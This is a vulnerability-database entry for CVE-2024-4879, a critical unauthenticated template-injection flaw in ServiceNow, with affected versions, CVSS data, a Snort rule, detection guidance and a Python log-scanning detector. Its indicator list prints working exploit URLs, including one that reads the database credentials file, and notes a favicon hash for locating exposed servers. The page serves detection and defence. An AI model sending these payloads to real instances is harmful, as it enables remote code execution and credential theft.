cbcvebase.
CVE-2024-4879
published 2024-07-10


Priority: P197 | critical | 9.8 (CVSS 3.1)
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
KEV | ITW | EXPLOIT | Initial access
CISA Known Exploited Vulnerability, due 2024-08-19
Exploited in the wild
EPSS: 99.98% (100.0th percentile)
ServiceNow has addressed an input validation vulnerability that was identified in Vancouver and Washington DC Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. ServiceNow applied an update to hosted instances, and ServiceNow released the update to our partners and self-hosted customers. Listed below are the patches and hot fixes that address the vulnerability. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.

Affected

14 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| servicenow | now_platform | < Utah Patch 10 Hot Fix 3 | Utah Patch 10 Hot Fix 3 |
| servicenow | now_platform | < Utah Patch 10a Hot Fix 2 | Utah Patch 10a Hot Fix 2 |
| servicenow | now_platform | < Vancouver Patch 6 Hot Fix 2 | Vancouver Patch 6 Hot Fix 2 |
| servicenow | now_platform | < Vancouver Patch 7 Hot Fix 3b | Vancouver Patch 7 Hot Fix 3b |
| servicenow | now_platform | < Vancouver Patch 8 Hot Fix 4 | Vancouver Patch 8 Hot Fix 4 |
| servicenow | now_platform | < Vancouver Patch 9 | Vancouver Patch 9 |
| servicenow | now_platform | < Vancouver Patch 10 | Vancouver Patch 10 |
| servicenow | now_platform | < Washington DC Patch 1 Hot Fix 2b | Washington DC Patch 1 Hot Fix 2b |
| servicenow | now_platform | < Washington DC Patch 2 Hot Fix 2 | Washington DC Patch 2 Hot Fix 2 |
| servicenow | now_platform | < Washington DC Patch 3 Hot Fix 1 | Washington DC Patch 3 Hot Fix 1 |
| servicenow | now_platform | < Washington DC Patch 4 | Washington DC Patch 4 |
| servicenow | servicenow | | |
| servicenow | servicenow | | |
| servicenow | servicenow | | |

Detection & IOCs (extracted from sources)

url: /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egs.addErrorMessage(668.5*2);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E
url: /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/conf/glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E
url: /login.do?jvar_page_title=gs.addErrorMessage(1337*1337);
path: /login.do
snort:
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS ServiceNow Command Injection Attempt (CVE-2024-5217,2024-4879) M2"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:9; content:"/login.do"; http.request_body; content:"jvar_page_title|3d|"; fast_pattern; pcre:"/^.*?(?:javascript|style)/R"; reference:cve,2024-5217; reference:cve,2024-4879; reference:url,www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data; reference:url,www.resilientx.com/blog/cve-2024-5217-servicenow-vulnerability; classtype:attempted-admin; sid:2060409; rev:1; metadata:affected_product ServiceNow, attack_target Server, tls_state plaintext, created_at 2025_02_27, cve CVE_2024_5217, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2025_02_27, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
  • POST-based exploitation has also been observed: look for POST requests to /login.do whose request body contains `jvar_page_title=` (written in the rule as `jvar_page_title|3d|`, where `|3d|` is the hex byte for `=`) followed by the keyword `javascript` or `style`, as matched by the Emerging Threats Snort rule (sid:2060409).
  • Second-stage payload attempts to read `/conf/glide.db.properties` via `Packages.java.io.File` and `SecurelyAccess` to exfiltrate database credentials. Monitor HTTP responses from /login.do for patterns matching `glide.db.*=`, `jdbc.*=`, or `database.*=`.
  • The ongoing exploitation utilizes a payload injection to check for a specific result in the server response, followed by a second-stage payload that checks the database contents, ultimately dumping user lists and account credentials (hashed or plaintext).
  • CVE-2024-4879 is actively chained with CVE-2024-5178 and CVE-2024-5217 for full database access. Detection logic should correlate exploitation attempts across all three CVEs from the same source IP.
  • Use Shodan favicon hash `1701804003` or FOFA `icon_hash=1701804003` to identify internet-exposed ServiceNow instances for asset inventory and attack surface monitoring.
  • ServiceNow's own investigation found no evidence that its hosted instances were impacted; the vendor states hosted instances received fixes on May 14, 2024, well before the July 10 public patch. Self-hosted and partner-managed instances are the primary risk surface.
  • The Nuclei template uses a single GET request with an arithmetic canary (1337*1337=1787569) for detection; this may produce false positives on patched instances that still reflect numeric strings in error messages for unrelated reasons. Confirm with the second-stage file-read payload before concluding exploitation.
  • The Emerging Threats Snort rule (sid:2060409) covers both CVE-2024-4879 and CVE-2024-5217 in a single signature and is scoped to plaintext (non-TLS) traffic only (`tls_state plaintext`). Encrypted ServiceNow traffic will not be inspected without TLS inspection in place.
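
The detection notes above can be applied to web or proxy logs after TLS termination. The following is an added example, not code from this page's sources: it flags `/login.do` requests whose `jvar_page_title` carries the rule's keywords or the Jelly tags from the listed URLs, checks responses for database property assignments, and groups hits by source IP. The function names, the combined-log-format assumption, the regex reading of the `glide.db.*=` patterns and the sample lines are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# Keywords from the Snort rule (javascript|style) plus Jelly tags seen in the listed URLs.
MARKERS = re.compile(r"javascript|style|<j:jelly|<g:evaluate|gs\.addErrorMessage", re.I)
# One reading of the response patterns named above (glide.db.*=, jdbc.*=, database.*=).
LEAK = re.compile(r"\b(?:glide\.db|jdbc|database)\.[\w.]+\s*=", re.I)
# Assumed combined log format: source IP, then "METHOD target PROTOCOL".
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "([A-Z]+) (\S+) [^"]*"')

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so multiply-encoded values are normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_injection_attempt(method, target, body=""):
    """True for /login.do requests whose jvar_page_title carries a marker."""
    parts = urlsplit(target)
    if parts.path != "/login.do":
        return False
    for pair in "&".join((parts.query, body)).split("&"):
        key, _, val = pair.partition("=")
        if decode_fully(key) == "jvar_page_title" and MARKERS.search(decode_fully(val)):
            return True
    return False

def response_leaks_db_config(response_body):
    """True when a /login.do response contains database property assignments."""
    return bool(LEAK.search(response_body))

def hits_by_source(log_lines):
    """Group flagged access-log requests by source IP for later correlation."""
    hits = defaultdict(list)
    for line in log_lines:
        m = LOG_LINE.match(line)
        if m and is_injection_attempt(m.group(2), m.group(3)):
            hits[m.group(1)].append(m.group(3))
    return dict(hits)

# Constructed sample lines (documentation IPs); query strings follow the canary URLs above.
SAMPLE = [
    '203.0.113.7 - - [10/Jul/2024:09:15:02 +0000] "GET /login.do?jvar_page_title=gs.addErrorMessage(1337*1337); HTTP/1.1" 200 4312',
    '203.0.113.7 - - [10/Jul/2024:09:15:09 +0000] "GET /login.do?jvar_page_title=%3Cstyle%3E%3Cg:evaluate%3Egs.addErrorMessage(668.5*2);%3C/g:evaluate%3E%3C/style%3E HTTP/1.1" 200 4330',
    '198.51.100.20 - - [10/Jul/2024:09:16:40 +0000] "GET /login.do HTTP/1.1" 200 2048',
]
```

Like the Snort rule, the bare `style` and `javascript` keywords can match benign page titles, so treat hits as leads to triage rather than confirmed exploitation.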

CVSS provenance

| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v4.0 | 9.3 | CRITICAL | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X |
| vulncheck | | 9.3 | CRITICAL | |
| cisa | | 9.3 | CRITICAL | |